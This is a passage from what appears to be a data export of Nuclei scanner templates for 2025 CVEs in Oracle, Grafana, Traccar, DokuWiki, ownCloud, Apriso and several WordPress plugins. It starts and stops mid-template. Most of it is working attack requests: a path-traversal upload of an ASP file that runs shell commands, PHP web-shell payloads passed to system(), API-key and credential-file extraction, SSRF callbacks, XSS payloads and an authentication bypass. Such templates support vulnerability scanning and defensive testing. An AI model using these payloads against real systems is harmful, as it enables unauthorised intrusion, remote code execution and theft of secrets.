true\n    extractors:\n      - type: regex\n        part: body\n        name: viewstate\n        group: 1\n        regex:\n          - '__VIEWSTATE\" value=\"(.*?)\"'\n        internal: true\n\n      - type: regex\n        part: body\n        name: eventval\n        group: 1\n        regex:\n          - '__EVENTVALIDATION\" value=\"(.*?)\"'\n        internal: true\n\n      - type: regex\n        part: body\n        name: viewgen\n        group: 1\n        regex:\n          - '__VIEWSTATEGENERATOR\" value=\"(.*?)\"'\n        internal: true\n\n  - raw:\n      - |-\n        POST /Apriso/Portal/Kiosk/Login.aspx?BackToStartPage=true HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE={{urlencode(viewstate)}}&__VIEWSTATEGENERATOR={{viewgen}}&__EVENTVALIDATION={{urlencode(eventval)}}&ctl04%24LoginTextBox={{username}}&ctl04%24PasswordTextbox={{password}}&ctl04%24LogInButton=Log+In&ctl04%24HiddenValue=Initial+Value&ctl04%24HiddenValue2=Initial+Value\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 302\n        internal: true\n\n# Self-deleteable ASP POC File\n  - raw:\n      - |\n        POST /Apriso/webservices/1.1/operation.svc/UploadFile?filename=375c9638-1a4e-465d-90d7-f69321315acb-xxx\\..\\..\\..\\portal\\Uploads\\{{filename}}.asp HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        <%\n          Response.Write \"{{randstr}}\" & \"<br>\"\n\n          Set rs = CreateObject(\"WScript.Shell\")\n          Set cmd = rs.Exec(\"cmd /c whoami\")\n          o = cmd.StdOut.Readall()\n          Response.write(o)\n\n          Set fso = Server.CreateObject(\"Scripting.FileSystemObject\")\n          fso.DeleteFile Server.MapPath(Request.ServerVariables(\"SCRIPT_NAME\")), True\n          Set fso = Nothing\n        %>\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - Uploads\n          - ResultMessage\n          - FilePath\n          - Success\n          - \"{{filename}}.asp\"\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /Apriso/Portal/Uploads/{{filename}}.asp HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"{{randstr}}\"\n\n    extractors:\n      - type: regex\n        group: 1\n        regex:\n          - <br>(.*)\n# digest: 4a0a0047304502204364c6cac6ee1fc406f4a53e9e738bbae39e154a28e3b7a4cda8945395bf8b5c022100e37b2dc9da91bd6bf780f7cc40d86e81dc325599ce95e01806e914cce49e0a9d:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-6204.yaml","vuln_id":"cve-2025-6204"},{"raw":"id: CVE-2025-62039\n\ninfo:\n  name: AI ChatBot with ChatGPT by AYS <= 2.6.6 - Unauthenticated API Key Exposure\n  author: pussycat0x\n  severity: high\n  description: |\n    AYS AI ChatBot with ChatGPT and Content Generator <= 2.6.6 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve sensitive information, exploit requires crafted input.\n  impact: Attackers can retrieve embedded sensitive information, potentially leading to data leakage and privacy violations.\n  remediation: Update to the latest version beyond 2.6.6.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ays-chatgpt-assistant/ai-chatbot-with-chatgpt-and-content-generator-by-ays-266-unauthenticated-information-exposure\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2025,wordpress,wp-plugin,ays-chatgpt-assistant\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=ays_chatgpt_admin_ajax&function=get_chatgpt_api_key\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"success\\\":true\")'\n          - 'contains(body, \"api_key\")'\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n        condition: and\n\n    extractors:\n      - type: json\n        name: api_key\n        json:\n          - '.data.api_key'\n# digest: 490a00463044022007d06b9472c223651fcb31380c476042becbef9dccb81772b40db1773b35c6e402200ac6a0dddd497a0797b264eef40b61cf750c2e1e14e96e4d6faa076716024975:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-62039.yaml","vuln_id":"cve-2025-62039"},{"raw":"id: CVE-2025-6197\n\ninfo:\n  name: Open Redirect via Organization Switching\n  author: iamnoooob,pdresearch\n  severity: medium\n  description: |\n    An open redirect vulnerability has been identified in Grafana OSS organization switching functionality. Prerequisites for exploitation Multiple organizations must exist in the Grafana instance - Victim must be on a different organization than the one specified in the URL\n  impact: |\n    Authenticated attackers can redirect users to arbitrary external domains through organization switching functionality, enabling phishing attacks and credential theft.\n  remediation: |\n    Upgrade Grafana OSS to the latest version that properly validates redirect URLs in organization switching functionality.\n  reference:\n    - https://grafana.com/blog/2025/07/17/grafana-security-release-medium-and-high-severity-fixes-for-cve-2025-6197-and-cve-2025-6023/\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-6197\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: html:\"grafana\"\n  tags: cve,cve2025,redirect,grafana,open-redirect,vuln\n\nvariables:\n  username: \"{{username}}\"\n  password: \"{{password}}\"\n  orgid: \"{{orgid}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n\n  - raw:\n      - |\n        POST /login HTTP/1.1\n        Host: {{Hostname}}\n        accept: application/json, text/plain, */*\n        DNT: 1\n        content-type: application/json\n        Origin: {{RootURL}}\n        Referer: {{RootURL}}/login\n        Cookie: redirect_to=%2F\n\n        {\"user\":\"{{username}}\",\"password\":\"{{password}}\"}\n\n    extractors:\n      - type: dsl\n        dsl:\n          - username\n          - password\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'Logged in'\n        internal: true\n\n      - type: word\n        part: header\n        words:\n          - 'grafana_session'\n        internal: true\n\n      - type: status\n        status:\n          - 200\n        internal: true\n\n  - raw:\n      - |\n        GET /%2f%5coast.pro?orgId={{orgid}} HTTP/1.1\n        Host: {{Hostname}}\n\n    redirects: true\n\n    matchers:\n      - type: dsl\n        name: open-redirect\n        dsl:\n          - status_code == 302\n          - contains(location, '//\\oast.pro?')\n        condition: and\n# digest: 4a0a004730450221008ec17c163026ecb384b6c7d4a84f2b0cf1d198bb9f1f0fc9f572a1a64a3da648022038da23f44d6deb5c841a950f6d029d8e06d77c6a006d602749928381d3dd368c:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-6197.yaml","vuln_id":"cve-2025-6197"},{"raw":"id: CVE-2025-61884\n\ninfo:\n  name: Oracle E-Business Suite - Server-Side Request Forgery\n  author: Kazgangap\n  severity: high\n  description: |\n    Vulnerability in the Oracle Configurator product of Oracle E-Business Suite (component: Runtime UI). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Configurator.\n  impact: |\n    Unauthenticated attackers can force the Configurator server to make requests to arbitrary URLs, potentially exposing internal services and sensitive data.\n  remediation: |\n    Apply the Oracle security patches as described in the Oracle security alert for E-Business Suite.\n  reference:\n    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-61884\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-61884\n    - https://www.oracle.com/security-alerts/alert-cve-2025-61884.html\n    - https://arcticwolf.com/resources/blog/cve-2025-61884/\n    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-61884.md\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2025-61884\n    cwe-id: CWE-918\n    epss-score: 0.95891\n    epss-percentile: 0.99872\n    cpe: cpe:2.3:a:oracle:configurator:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: title=\"E-Business Suite\"\n  tags: cve,cve2025,oracle,e-business,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /OA_HTML/configurator/UiServlet HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        redirectFromJsp=1&getUiType=<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n        <initialize>\n          <param name=\"init_was_saved\">{{to_lower(rand_text_alpha(6))}}</param>\n          <param name=\"return_url\">http://{{interactsh-url}}</param>\n          <param name=\"ui_def_id\">0</param>\n          <param name=\"config_effective_usage_id\">0</param>\n          <param name=\"ui_type\">Applet</param>\n        </initialize>\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"valid_configuration\",\"terminate\")'\n          - 'contains(interactsh_protocol, \"dns\")'\n        condition: and\n# digest: 4b0a00483046022100c6c45ad07ebf9144187f0345f76a7504d86f65f7ff5267d57d5831091dea9358022100f6eeca5eaae041fd8161721399267c1b8b160370fbf56fcff7005d535d467bc5:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-61884.yaml","vuln_id":"cve-2025-61884"},{"raw":"id: CVE-2025-61882\n\ninfo:\n  name: Oracle E-Business Suite 12.2.3–12.2.14 – Remote Code Execution\n  author: testanull,watchtowr,DhiyaneshDk,pussycat0x\n  severity: critical\n  description: |\n    Oracle Concurrent Processing 12.2.3-12.2.14 contains a remote code execution caused by unauthenticated network access via HTTP, letting unauthenticated attackers fully compromise the system, exploit requires network access via HTTP.\n  impact: |\n    Unauthenticated attackers can fully compromise Oracle Concurrent Processing, leading to complete system takeover.\n  remediation: |\n    Update to the latest available version beyond 12.2.14.\n  reference:\n    - https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/\n    - https://github.com/watchtowrlabs/watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882\n    - https://www.oracle.com/security-alerts/alert-cve-2025-61882.html\n    - https://blogs.oracle.com/security/post/apply-july-2025-cpu\n    - https://vred.mbbank.com.vn/p/oracle-e-business-suite-authentication\n    - https://gist.github.com/testanull/a897473577b8650932221172e50304ce#file-ebs_cve-2025-61882_poc-py\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: title=\"E-Business Suite\"\n  tags: cve,cve2025,oracle,ebusiness,lfi,rce,ssrf,kev,vkev,vuln\n\nvariables:\n  payload: \"sysadmin:INVALID\"\n\nflow: http(1) || http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /OA_HTML/SyncServlet HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/vnd.syncml+xml\n\n        <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n        <SyncML>\n          <SyncHdr>\n            <VerDTD>1.1</VerDTD>\n            <VerProto>SyncML/1.1</VerProto>\n            <SessionID> 1</SessionID>\n            <MsgID>1</MsgID>\n            <Target><LocURI>http://localhost</LocURI></Target>\n            <Source><LocURI>device-123</LocURI></Source>\n            <Cred>\n              <Meta>\n                <Format>b64</Format>\n                <Type>syncml:auth-basic</Type>\n              </Meta>\n              <Data>{{base64(payload)}}</Data>\n            </Cred>\n          </SyncHdr>\n          <SyncBody>\n            <Alert>\n              <CmdID>1</CmdID>\n              <Data>200</Data>\n            </Alert>\n            <Final/>\n          </SyncBody>\n        </SyncML>\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"RespURI\"\n          - \"Final\"\n          - \"sid\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        name: sid\n        part: body\n        group: 1\n        regex:\n          - 'sid%3([A-Za-z0-9]+)%26device'\n\n  - raw:\n      - |\n        GET /OA_HTML/help/../ieshostedsurvey.jsp HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        name: lfi\n        dsl:\n          - \"status_code == 200\"\n          - \"contains(body, '$Header: ieshostedsurvey.jsp')\"\n        condition: and\n# digest: 4a0a00473045022016cf05a308630f1ef2a660743d2b4196ee059001f4389ab4ecafab2af2b227e6022100e7d0f6a4f5e451c1e76c03d200c103499c24d0ebbcedad09a5dc23046674fb63:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-61882.yaml","vuln_id":"cve-2025-61882"},{"raw":"id: CVE-2025-61757\n\ninfo:\n  name: Oracle Identity Manager REST WebServices - Authentication Bypass\n  author: ritikchaddha\n  severity: critical\n  description: |\n    Vulnerability in the Identity Manager product of Oracle Fusion Middleware (component: REST WebServices). Supported versions that are affected are 12.2.1.4.0 and 14.1.2.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Identity Manager. Successful attacks of this vulnerability can result in takeover of Identity Manager.\n  impact: |\n    Allows unauthenticated attacker to fully compromise Oracle Identity Manager via HTTP(S), leading to complete loss of confidentiality, integrity, and availability.\n  remediation: |\n    Apply the latest security updates released by Oracle as referenced in the October 2025 Critical Patch Update.\n  reference:\n    - https://slcyber.io/research-center/breaking-oracles-identity-manager-pre-auth-rce/\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-61757\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-61757\n    epss-score: 0.88647\n    epss-percentile: 0.99767\n    cwe-id: CWE-306\n    cpe: cpe:2.3:a:oracle:identity_manager:12.2.1.4.0:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: oracle\n    product: identity_manager\n    shodan-query: title:\"oracle access management\"\n    fofa-query: title=\"oracle access management\"\n  tags: cve,cve2025,oracle,identity-manager,auth-bypass,rce,kev,vkev,vuln\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 401'\n          - 'contains(header, \"Oracle\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /iam/governance/applicationmanagement/api/v1/applications/groovyscriptstatus;.wadl HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"text/plain\")'\n          - 'contains(body, \"Script Compilation Successful\")'\n        condition: and\n# digest: 490a004630440220242f7bb6d6d16264bbe5979b77a94a0800ad805a4c4fe18b4cdd79d3d0349b31022039abcea93b47be7aa6e5e6a60d929c825d4fd2d8e9760328e6a0946ba56c3666:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-61757.yaml","vuln_id":"cve-2025-61757"},{"raw":"id: CVE-2025-6174\n\ninfo:\n  name: WordPress Qwizcards < 3.95 - Cross-Site Scripting (Reflected)\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    The WordPress Qwizcards plugin before version 3.95 does not sanitise and escape the \"theme_stylesheet\" parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting vulnerability.\n  impact: |\n    Attackers can execute scripts in the context of high privilege users, potentially leading to account compromise or session hijacking.\n  remediation: |\n    Update to the latest version beyond 3.9.4.\n  reference:\n    - https://wpscan.com/vulnerability/ff827f67-712e-4ab6-b6aa-7f5e6ff1283a/\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-6174\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2025-6174\n    epss-score: 0.0046\n    epss-percentile: 0.39148\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 1\n  tags: cve,cve2025,qwizcards,wordpress,wp-plugin,xss,unauth,vkev,vuln\n\nvariables:\n  randstr: \"{{rand_base(8)}}\"\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/qwiz-online-quizzes-and-flashcards/qwiz_admin_sample_buttons.php?theme_stylesheet=\\\"><script>alert('{{randstr}}')</script>\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<script>alert('{{randstr}}')</script>\"\n          - \"rel=\\\"stylesheet\\\"\"\n          - \"qwiz_button\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022002cd8f70490593fc70505107bfee0b1eda58fa6ba43512537c9c988001692d7e0220313345278513b133ca056575dc1f238a4c0aaa9de5cada3bf562a401628ecbfa:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-6174.yaml","vuln_id":"cve-2025-6174"},{"raw":"id: CVE-2025-61666\n\ninfo:\n  name: Traccar(Windows) 6.1- 6.8.1 - Local File Inclusion\n  author: securitytaters\n  severity: high\n  description: |\n    Traccar 5.8-6.0 (non-default installs with web.override set) and 6.1-6.8.1 (default installs) contain a local file inclusion vulnerability caused by enabled web override configuration, letting unauthenticated attackers leak arbitrary files including passwords, exploit requires local access.\n  impact: |\n    Unauthenticated local attackers can read arbitrary files, potentially exposing sensitive information like passwords and configuration data.\n  remediation: |\n    Upgrade to version 6.9.0 or later.\n  reference:\n    - https://github.com/traccar/traccar/security/advisories/GHSA-hprc-rph8-fj87\n    - https://projectblack.io/blog/jetty-addpath-lfi/\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"Traccar\"\n    fofa-query: app=\"Traccar\"\n  tags: cve,cve2025,traccar,lfi,vuln,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgram%20Files%5ctraccar%5cconf%5ctraccar.xml HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(content_type, \"application/xml\")'\n          - 'contains_all(body, \"database.driver\",\"database.password\",\"database.user\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 490a004630440220370b6e9dd2bd6a73365722f0e3592af94daf68a1a20fac279880e7a1e138d19e02204704df080f303d99e794479ce8f35e333f55abc50c40ac5e4af49d3380054ce8:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-61666.yaml","vuln_id":"cve-2025-61666"},{"raw":"id: CVE-2025-61224\n\ninfo:\n  name: DokuWiki <= 2025-05-14a Librarian - Reflected Cross-Site Scripting\n  author: lolkatz,0x_Akoko\n  severity: medium\n  description: |\n   DokuWiki 2025-05-14a 'Librarian' contains a stored XSS caused by improper sanitization of the 'q' parameter, letting remote attackers execute arbitrary scripts, exploit requires no special privileges.\n  impact: |\n   Remote attackers can execute arbitrary scripts in users' browsers, potentially stealing cookies or performing actions on behalf of users.\n  remediation: |\n   Update to the latest version of DokuWiki.\n  reference:\n    - https://github.com/dokuwiki/dokuwiki/issues/4512\n    - https://github.com/MarioTesoro/vulnerability-research/tree/main/CVE-2025-61224\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-61224\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2025-61224\n    epss-score: 0.01454\n    epss-percentile: 0.72294\n    cwe-id: CWE-79\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: dokuwiki\n    product: dokuwiki\n    shodan-query: http.html:\"content=\\\"DokuWiki\"\n    fofa-query: body=\"content=\\\"DokuWiki\"\n  tags: cve,cve2025,dokuwiki,xss,reflected\n\nhttp:\n  - method: GET\n    path:\n      - '{{BaseURL}}/doku.php?id=start&do=search&q=the%20%40%3Csvg%2Fonload%3Dalert%60document.domain%60%3E'\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'current changed\">@<svg/onload=alert'\n          - 'content=\"DokuWiki'\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"text/html\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100e7bf750d2c68c1975a02cf779b106ae06e37d769edfe226b4e068a4a6cee1e0e02201d46fc45b1fce91dc041c1c5a720b245bfadb7ee6a915ad2add840a4f210eb4f:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-61224.yaml","vuln_id":"cve-2025-61224"},{"raw":"id: CVE-2025-6058\n\ninfo:\n  name: WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload\n  author: pussycat0x\n  severity: critical\n  description: |\n    The WPBookit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the image_upload_handle() function hooked via the 'add_booking_type' route in all versions up to, and including, 1.0.4.\n  impact: |\n    Unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n  remediation: Fixed in 1.0.5\n  reference:\n    - https://wordpress.org/plugins/wpbookit/\n    - https://github.com/Nxploited/CVE-2025-6058\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpbookit/wpbookit-104-unauthenticated-arbitrary-file-upload\n  classification:\n    epss-score: 0.05537\n    epss-percentile: 0.92471\n  metadata:\n    verified: true\n    max-request: 1\n    publicwww-query: \"/wp-content/plugins/wpbookit/\"\n    fofa-query: body=\"/wp-content/plugins/wpbookit/\"\n  tags: cve,cve2025,wordpress,wpscan,wpbookit,intrusive,file-upload,wp,vuln\n\n\nvariables:\n  payload: '<?php echo \"<br>\"; if(isset($_GET[\"cmd\"])){ echo \"<pre>\"; system($_GET[\"cmd\"]); echo \"</pre>\"; } ?>'\n  cmd: 'id'\n  month: '{{date_time(\"%Y/%M\")}}'\n  filename: \"{{to_lower(rand_base(5))}}\"\n  string: \"{{to_lower(rand_base(8))}}\"\n\nflow: http(1) && http(2) && http(3)\n\nhttp:\n  - raw:\n      - |\n        GET /wp-content/plugins/wpbookit/README.txt HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"WPBookit\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\n\n        ------WebKitFormBoundary7MA4YWxkTrZu0gW\n        Content-Disposition: form-data; name=\"action\"\n\n        wpb_ajax_post\n        ------WebKitFormBoundary7MA4YWxkTrZu0gW\n        Content-Disposition: form-data; name=\"route_name\"\n\n        add_booking_type\n        ------WebKitFormBoundary7MA4YWxkTrZu0gW\n        Content-Disposition: form-data; name=\"title\"\n\n        {{string}}\n        ------WebKitFormBoundary7MA4YWxkTrZu0gW\n        Content-Disposition: form-data; name=\"booking_type\"\n\n        {{string}}\n        ------WebKitFormBoundary7MA4YWxkTrZu0gW\n        Content-Disposition: form-data; name=\"cover_image_img\"; filename=\"{{filename}}.php\"\n        Content-Type: application/octet-stream\n\n        {{payload}}\n        ------WebKitFormBoundary7MA4YWxkTrZu0gW--\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains_all(body, \"success\",\"status\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /wp-content/uploads/{{month}}/{{filename}}.php?cmd={{cmd}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'regex(\"uid=\\\\d+\\\\([^)]+\\\\) gid=\\\\d+\\\\([^)]+\\\\) groups=\\\\d+\\\\([^)]+\\\\)\", body)'\n        condition: and\n# digest: 4a0a004730450220763880739411ba7416c5a6fe6e0de4f2d074dc18ab6013ec85f3b1ed61a3d547022100be61706077b1baf1197ee38a53d762dbc8fa1fc03acdc54bf92b1066189fd702:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-6058.yaml","vuln_id":"cve-2025-6058"},{"raw":"id: CVE-2025-60188\n\ninfo:\n  name: Atarim < 4.2.2 - Sensitive Information Exposure\n  author: m4sh_wacker\n  severity: high\n  description: |\n    Vito Peleg Atarim <= 4.2 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve embedded sensitive data remotely, exploit requires no special privileges.\n  impact: |\n    Attackers can retrieve embedded sensitive data, potentially leading to information disclosure.\n  remediation: |\n    Update to the latest version beyond 4.2.\n  reference:\n    - https://github.com/m4sh-wacker/CVE-2025-60188-Atarim-Plugin-Exploit\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: body=\"atarim\"\n  tags: cve,cve2025,wordpress,wp-plugin,atarim,exposure,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-json/atarim/v1/db/vc\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"wpf_site_id\":\"'\n          - '\"notify_user\":'\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: regex\n        name: site_id\n        part: body\n        group: 1\n        regex:\n          - '\"wpf_site_id\":\"([0-9]+)\"'\n        internal: true\n\n\n      - type: regex\n        name: username\n        part: body\n        group: 1\n        regex:\n          - '\\\\?\"username\\\\?\":\\\\?\"([^\"\\\\]+)'\n        internal: true\n\n      - type: dsl\n        dsl:\n          - '\"username: \"+ username'\n          - '\"Site_ID: \"+ site_id'\n# digest: 4b0a00483046022100a2c4a4846a12c5384ae5f9b295c952528b10bb76bb0597f5a8b8dd7c8aa7a492022100e48c645dd35352d289b3d6d93ddbe0647a5231cf1509aed44380b356df4a2d0b:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-60188.yaml","vuln_id":"cve-2025-60188"},{"raw":"id: CVE-2025-59716\n\ninfo:\n  name: ownCloud Guests - User Enumeration\n  author: DhiyaneshDk\n  severity: medium\n  description: |\n    ownCloud Guests before 0.12.5 contains an unauthenticated user enumeration vulnerability caused by insufficient validation of the token in showPasswordForm at /apps/guests/register/{email}/{token}, letting unauthenticated attackers enumerate valid guest users, exploit requires no authentication.\n  impact: |\n    Unauthenticated attackers can enumerate valid guest users, potentially aiding further targeted attacks.\n  remediation: |\n    Update to version 0.12.5 or later.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-59716\n    - https://gist.github.com/thesmartshadow/64ae0449e909174d0479a4f23657147f\n    - https://marketplace.owncloud.com/apps/guests\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2025-59716\n    epss-score: 0.00888\n    epss-percentile: 0.57772\n    cwe-id: CWE-203\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: owncloud\n    product: guests\n    shodan-query: http.title:\"ownCloud\"\n    fofa-query: title=\"ownCloud\"\n  tags: cve,cve2025,owncloud,enum,user-enum,guests,vkev\n\nvariables:\n  email: \"{{randstr}}@{{rand_base(5)}}.com\"\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/apps/guests/register/{{email}}/invalid-token-12345\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"No such guest user\"\n          - \"ownCloud\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a0047304502210086bd13f68f1aad3c784a3daa68774c5c8913315588afe4bb3ca156ec203740ea02207d553ec57e944f34e4b6b23e01f8cdcd1566bea5702f6444bf20fe036f153f6d:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-59716.yaml","vuln_id":"cve-2025-59716"},{"raw":"id: CVE-2025-5961\n\ninfo:\n  name: WordPress WPvivid Backup & Migration Plugin <= 0.9.116 - Authenticated Arbitrary File Upload\n  author: pussycat0x\n  severity: high\n  description: |\n    The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpvivid_upload_import_files' function in all versions up to, and including, 0.9.116.\n  impact: |\n    An authenticated attacker can upload arbitrary files, including PHP files, which can lead to remote code execution, complete system compromise, and unauthorized access to sensitive data.\n  remediation: |\n    Update the WPvivid Backup & Migration plugin to a version that addresses this vulnerability or remove the plugin if no fix is available.\n  reference:\n    - https://github.com/Nxploited/CVE-2025-5961\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpvivid-backuprestore/migration-backup-staging-wpvivid-backup-migration-09116-authenticated-administrator-arbitrary-file-upload\n  classification:\n    epss-score: 0.57566\n    epss-percentile: 0.99037\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 8.8\n    cve-id: CVE-2025-5961\n    cwe-id: CWE-434\n  metadata:\n    verified: true\n    max-request: 4\n    publicwww--query: \"/plugins/wpvivid-backuprestore/\"\n  tags: cve,cve2025,wordpress,wp,wp-plugin,intrusive,wpvivid-backuprestore,authenticated,file-upload,backup,vuln\n\nvariables:\n  payload: '<?php echo \"<br>\"; if(isset($_GET[\"cmd\"])){ echo \"<pre>\"; system($_GET[\"cmd\"]); echo \"</pre>\"; } ?>'\n  cmd: 'id'\n  filename: \"{{rand_text_alpha(12)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /wp-login.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        log={{username}}&pwd={{password}}&wp-submit=Log+In\n\n      - |\n        GET /wp-admin/admin.php?page=wpvivid-export-import HTTP/1.1\n        Host: {{Hostname}}\n\n      - |\n        POST 